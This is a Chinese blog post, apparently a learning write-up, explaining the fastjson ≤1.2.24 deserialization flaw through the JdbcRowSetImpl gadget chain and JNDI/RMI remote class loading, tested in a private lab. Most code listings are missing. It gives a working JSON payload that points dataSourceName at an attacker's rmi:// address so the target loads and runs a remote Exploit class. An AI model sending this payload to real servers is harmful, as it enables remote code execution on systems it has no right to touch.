fastjson反序列化漏洞_fastjson结合JdbcRowSetImpl反序列化利用理解

最新推荐文章于 2024-04-11 17:57:36 发布
最新推荐文章于 2024-04-11 17:57:36 发布
阅读量438 收藏
点赞数
文章标签: fastjson反序列化漏洞 fastjson反序列化过滤字段属性 fastjson取某个key fastjson查找指定键值 字符串序列化调用writeutf

a880e8a5639eff71ffb59822b77a98fa.png
前言

最近看到网上有新出的fastjson反序列化利用,就好奇的琢磨了一下,查了一些资料然后整理出来,有不正确的地方还望指正。

反序列化的利用本质:

  • 找到一条有效的攻击链,攻击链的末端就是有代码执行能力的类,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。
  • 构造一个触发器,也就是通过什么方式来让攻击链执行你想要的代码。触发器可以通过很多方式,比如静态代码块、构造方法等等。

fastjson是阿里巴巴开源的一款很优秀的JSON库。

JSON是一种用于交换的数据格式,可以在不同平台、不同语言之间传递数据,类似的还有XML。既然要传递,就涉及到序列化(将不同语言的对象转成json字符串)和反序列化(将json字符串还原成程序所需的对象)。

fastjson的简单用法

谈漏洞利用之前先简单的体验一下fastjson的用法。

# 先定义一个待序列化的User类:

package

#序列化与反序列化操作

package

通过JSON的toJSONString()方法将对象进行序列化,可以在在对象中指定哪些实例属性是需要被序列化的,以及序列化以后属性的顺序。

通过JSON的parseObject()方法将JSON字符串反序列化成对象,可以直接作为原始类的实例来接收,也可以使用Object。还有parseArray()以及parse()反序列化方法,道理都差不多,只是解析出来的数据类型不一样。

本地模拟反序列化的利用

前面说完了基本用法,只靠着前面那点东西是肯定实现不了反序列化利用的,因为你控制不了服务端会用把你传过去内容当成什么类型来解析,所以这里再引入一个@type。

看一段代码:

String

在上面提到的序列化的过程中加入了第二个参数,看参数名就知道是要在结果中写入被序列化的类的名字,看下序列化的结果:

序列化后的json字符:

@type的值是序列化出来的类的名字,同理在反序列化的时候就会去解析这个type,即通过type执行了反序列化的类型,这就是我们可以利用的,这里是必要的第一步。

知道了这个第一步,就可以在本地模拟一个反序列化利用的过程:

package

这里直接给parseObject指定了一个JSON字符串,并且通过@type指定了当做T1类来解析。在T1类中写了一个无参构造方法,方法中通过exec执行了外部命令计算器,效果如图:

67920debe605a80e47d292a7b3b8a9a1.png

当然这只是本地演示,实际的开发中肯定不会有人在服务端写这么个直接执行系统命令的代码让你随便使。要知道我们通过序列号传递到服务端的只是“键值对”,也就是数据,具体的数据要怎么来解析还是得反序列化的服务端来实现。

什么是JNDI?

说完了fastjson的简单使用,再来说说什么是JNDI。

JDNI是有sun提出的一个规范,全称是“命名和目录提供程序”(Naming and Directory Providers),用来解耦应用,让整个程序更便于扩展、部署以及应用。例如程序中可能会用到JDBC来操作数据库,由于数据库的配置是可能频繁变更的,就可以通过JDNI的方式把JDBC的配置从程序中解耦出来,当然这只是一个很小的一方面。

JDNI底层可以驱动一系列的远程对象,例如RMI、LDAP等等,具体见下图(侵删):

5e52c5baf875bc0932666861ad270bc9.png

Naming Manger用于维护Naming和Directory的context objects对象以及对应的引用,可以通过Registry.bind()方法来创建,可以简单理解成有一对键值,键是“别名”,值是具体对应的“对象”,可以通过这个别名来找到这个对象,这个“对象”可以直接是一个引用对象,例如自定义的类实例,也可以是一个Naming Reference。Naming Reference可以指定一个外部的远程对象,是很重要的一个功能。

什么是RMI?

RMI(Remote Method Invocation)远程方法调用,是专为Java环境设计的远程方法调用机制,远程服务器实现具体的Java方法并提供接口,客户端本地仅需根据接口类的定义,提供相应的参数即可调用远程方法。

1、运行了RMI的一端可以被称为“RMIServer”,用来提供可被远程调用的方法,这个过程称为“注册”,一般实现为(192.168.76.133):

//JNDIServer.java

reference的功能已经在前面简单的介绍过,做为一个外部远程对象,目的是让客户端来获取RMI Server上的引用对象,指定了codebase也就是远程的地址,以及要获取的factory类名,剩下的就是等客户端来主动请求。

请求的方式是通过http,就需要在192.168.76.133上运行http服务,并把已经编译好的serialize.Exploit.class放到响应的目录供客户端获取。具体的Exploit里面要放些什么后面会涉及到。

这里就体现了RMI的核心,RMI核心特点之一就是动态类加载,如果当前JVM中没有某个类的定义,它可以从远程URL去下载这个类的class。

2、运行了looup()方法的一端可以被称为 "RMIClient",根据RMI请求返回的结果来再次通过http获取所需的factory类并进行实例化,下面是一个本地模拟的实现(192.168.76.1):

// Test.java
模拟JNDI注入

上面已经简单实现了一个服务端提供RMI,一个客户端来请求服务器,剩下的就是实现那个最重要的Exploit:

//Exploit.java

编译成class,然后放到192.168.76.133/serialize目录下(因为我这里Exploit是在serialize包里面),同时运行JNDIServer注册RMI服务,最后在192.168.76.1上运行Test。

运行结果:

5ae57830226f925ebb97b05ccccd681e.png

抓包:

12d6bd72827032fe9cde237af2d379b5.png

可以看到192.168.76.1先对192.168.76.133发起RMI请求,然后又发起了HTTP请求,请求的是/serialize/Exploit.class,然后执行了Exploit构造方法。

大致的交互过程:

44617cf78dbe692bcda428422ac2b11d.png

稍微总结一下就是,如果要成功利用这个looup()来做一些事,就必须要以下条件:

1、lookup()的参数是我们能控制的;

2、远程URL是我们能控制的;

JdbcRowSetImpl利用链

上面简单的讲完了JNDI注入的方式,但是问题来了,RMIClient的代码都是我自己臆想的,什么地方提供了lookup()方法并且可以自定义rmi的URL呢?

这里就引出了利用链,可以理解成经过一系列的调用最终能执行lookup()并且传入了我们指定的URL,同时存在利用链的地方应该是JDK默认内置的库,或者很知名的很常见的库,因为这些更大的可能性会内置在目标应用当中,如果是个人开发的或者没多少人用的库就算存在利用链也没什么用,压根就没有用武之地。

这里要介绍的是JdbcRowSetImpl的利用链,是由@matthias_kaiser在2016年发现的,我这里只是简单的再根据自己的理解复述一下。

分析过程:

1、找到JdbcRowSetImpl中调用了lookup()方法的函数;

8de935ea22de9efa84137d44a7334f91.png

在com.sun.rowset.JdbcRowSetImpl.class中的connect()中调用了looup(),并且looup的参数是通过getDataSourceName()方法获取到的,这一点很关键,需要确认这个get的结果是否是我们可控的。

1.1、确认getDataSourceName()方法的传值;

44845e3e9a75709c75efdb3562808920.png

javadoc里面写明了DataSource是通过setDataSourceName来设置的,也就是dataSource属性的set和get方法;

083f8e51cfd41da3bb1fc3e1cc222965.png

至于怎么样来调用set方法,后面会提到。

2、找到调用connect()方法的函数;

eeb26c854527a2e2fbbc9677d2cf282b.png

有三个方法中都调用了这个connect(),那么就需要一个一个的筛选,看看那些是我们能利用的。

3、分别分析这三个方法;

3.1、prepare()方法:

3fe705ccb5d1d71bc62199ca5c5eacf9.png

execute()->prepare()->connect(),也就是得执行excute()方法才会执行到connect(),这个execute应该是用来执行sql查询的:

8ba6666537a0c5ea35b1afbfbaf09618.png

3.1、getDatabaseMetaData()方法:

30beb03e0668ec24fcd6152b5536eca4.png

只是用来获取databaseMetaData,没找到对应的set方法,只有get方法的话这里就没办法利用了。

3.2、setAutoCommit()方法:

a9f86a959a37672fcc81b8b5604a2c4c.png

用来设置autoCommit属性的值,传值是一个boolean。autoCommit属性使用了set和get方法:

fb3f1c5128e21247d9fe6a3f17d80058.png

这个set方法很重要,只要能设置autoCommit就能调用set方法,而setAutoCommit()方法里面又调用了connect(),connent里面就有我们需要的lookup()。

≤1.2.24 版本的fastjson结合JdbcRowSetImpl利用链

前面已经简单的介绍了JdbcRowSetImpl利用链,重点在于如何调用autoCommit的set方法,这一点正好结合fastjson的功能,再来回顾一下最前面提到的fastjson的简单操作:

package

fastjson在反序列化的时候会对json字符串指定的属性调用对应的set方法,例如这里我设置了username为zhousl,那么反序列化的时候就会自动调用setUsername方法,然后通过@type指定要当做哪个类来解析,这个过程就构成了我们能操作利用JdbcRowSetImpl的攻击链:

1、目前是驱动JdbcRowSetImpl库;

2、通过设置dataSourceName属性传参给lookup()方法;

2、通过设置autoCommit属性来触发执行最终的lookup()方法。

按照上面的例子,就可以构造出:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.76.133:1099/Exploit","autoCommit":true}

这里要注意几点:

1、dataSourceName 需要放在autoCommit的前面,因为反序列化的时候是按先后顺序来set属性的,需要先setDataSourceName,然后再setAutoCommit,具体可以见源代码;

2、rmi的url后面跟上要获取的我们远程factory类名,因为在lookup()里面会提取路径下的名字作为要获取的类:

1b1cff34094dd681cf38238fc082e67b.png

测试结果(本机是192.168.76.1,在192.168.76.133上运行rmi和http,然后把Exploit.class放到serialize目录,环境在最前面已经讲过):

4b0691565994af9adf95f99d2cee602c.png
后记

整个过程废话比较多,我是一个菜鸟,网上看了很多篇文章然后折腾了三天才琢磨清楚和写完,希望对想了解的人有点帮助~

说道最后还是只是讲了之前版本的fastjson的反序列化利用,写不动了,歇歇。

weixin_39783156
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用链分析(TemplatesImpl,JdbcRowSetImpl
m0_64685672的博客
02-03 2777
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;
Fastjson反序列化漏洞史1
08-03
Fastjson 反序列化漏洞史2020年05月08日漏洞分析 (/category/vul-analysis/) · 404专栏 (/category/404
14-java安全——fastjson1.2.24反序列化JdbcRowSetImpl利用链分析
网络安全
09-01 739
fastjson在1.2.24版本中,除了TemplatesImpl链之外,还有一个JdbcRowSetImpl利用链,JdbcRowSetImpl链有两种利用方式:一种是RMI和JNDI利用方式,另一种是JNDI和LDAP利用方式,关于JNDI的相关概念之前在java安全基础中已经介绍过了,而且底层原理已经分析过了,大家可自行参考以下文章。 4-java安全基础——RMI远程调用 5-java安全基础——RMI和JNDI实现漏洞利用 6-java安全基础——JNDI和LDAP利用 1. RMI
用marshalsec & Jndi注入利用工具(JNDI-Injection-Exploit)复现Fastjson反序列化漏洞--保姆级!复现过程!
最新发布
2301_79837041的博客
04-11 1546
安装maven环境后,更新完环境变量,但是每次使用mvn命令必须在source之后才能使用,我用的是kali,网上文章说在~./bash里面更新source /etc/profile 我试过了,没有用,最后是换在ubuntu系统里面安装才成功的,目前还不知道为什么,有大佬知道可以告诉我一下。在fastjson中我们使用构造的json格式字符串进行反序列化的攻击,我们给指定类中的值输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞
fastjson反序列化JdbcRowSetImpl
qq_40710190的博客
07-08 262
fastjson利用
漏洞复现】Fastjson反序列化
网络安全知识分享
12-31 5786
Fastjson反序列化一、简介二、序列化反序列化三、Fastjson漏洞介绍1、漏洞原理2、RMI3、JNDI4、JEP290四、编写的简单测试的环境五、漏洞版本1、fastjson<=1.2.241.1、TemplatesImpl 利用链分析1.2、JNDI利用链分析1.3、JNDI利用1.4、官方进行的修复2、fastjson<=1.2.413、fastjson<=1.2.424、fastjson<=1.2.455、fastjson<=1.2.476、1.2.48&lt
FastJson对于序列化反序列化时实体属性自定解析器
随心所鱼的博客
01-13 2160
本文记录FastJson对于序列化反序列化时实体属性自定解析器实现简述 使用场景 项目在针对实体进行序列化为JSON或者JSON反序列化时,存在自定义字段解析器的需求,最常见的场景为时间属性(标准格式或非标准格式)的序列及反序列化.下文针对该情况,说明如何实现自定时间反序列化解析器. 操作步骤 1.fastjson版本 <dependency> <groupId>com.alibaba</groupId> <artifactId>fast
fastjson 反序列化之mysql JDBC 利用
qq_42077227的博客
04-19 1978
在打春秋云境Exchange 靶场时,入口点是华夏ERP 2.3版本系统,存在fastjson 反序列化漏洞,在尝试常见的fastjson利用链反弹shell都没有反应,最终使用mysql JDBC利用链反弹shell成功。在此记录一下。
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
SpringBoot Redis配置Fastjson进行序列化反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令...
fastjson @JSONField 自定义序列化反序列化
weixin_43931625的博客
07-18 5708
fastjson自定义序列化反序列化
JAVA详细思路|Java安全之FastJson JdbcRowSetImpl 链分析
m0_57227221的博客
05-17 1043
Java安全之FastJson JdbcRowSetImpl 链分析 0x00 前言 这一次我们来学习 JdbcRowSetImpl 利用链, JdbcRowSetImpl利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。 0x01 漏洞分析 利用限制 首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。 RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 LADP利用JDK版本≤
sqlrowset 转化为json_数据库记录转换成json格式
weixin_32880357的博客
12-23 417
/1.在company数据user表中出10条数据,保存为数组2.在将数组转化为json格式,传递给js3.用json解析器将传递过来的json字符串转化为json对象,4.用document.write输出语句打印在页面上*/$conn = mysql_connect(“localhost”,”root”,”root”);//连接数据库mysql_query(“set names utf...
将输出结果以json类型打印在控制台上_json与字典转换,傻傻分不清?
weixin_39534780的博客
11-21 313
jsonJSON(JavaScript Object Notation) 是一种轻量级的数据交换格式,易于人阅读和编写JSON 函数使用 JSON 函数需要导入 json 库:import json。描述json.dumps将 Python 对象编码成 JSON 字符串json.loads将已编码的 JSON 字符串解码为 Python 对象24.1 json.dumpsjson.dumpsjso...
Java数据库ResultSet转json实现
移动编程
02-26 724
现在有很多json相关的Java工具,如json-lib、gson等,它们可以直接把JavaBean转换成json格式。 在开发中,可能会从数据库中获数据,希望直接转成json数组,中间不通过bean。 比如进行下面的转换: 数据表: id name age 1 xxg 23 2 xiaomin...
ResultSet与JSON之间的转化
低调的嚣张
04-13 1484
1.操作JSON的JAR包如下: 2.ResultSet--->JSONObject [java] view plain copy /**       * 将resultSet转化为JSONObject       * @param rs       * @return       * @throws SQLException       * @throws J
FastJson序列化属性名格式诡异现象
liangheyan的专栏
08-10 1629
      本人能力有限,不一定完全正确。在里写是为了自己以后方便查阅.对于其他人可以起到抛砖引玉的作用。 现象:      FastJson序列化属性名的格式在同一应用有的序列化属性名是驼峰格式userId:1000,有的序列化后是Snake格式user_id:1000。 应用:      FastJson在1.2.15版本之后支持配置的PropertyNamingStrategy四种...
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
然而,Fastjson存在反序列化漏洞,黑客可以利用漏洞实现远程代码执行,因此该漏洞被广泛利用。 检测Fastjson反序列化漏洞的方法: 1. 扫描源代码,搜索是否存在Fastjson相关的反序列化代码,如果存在,则需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值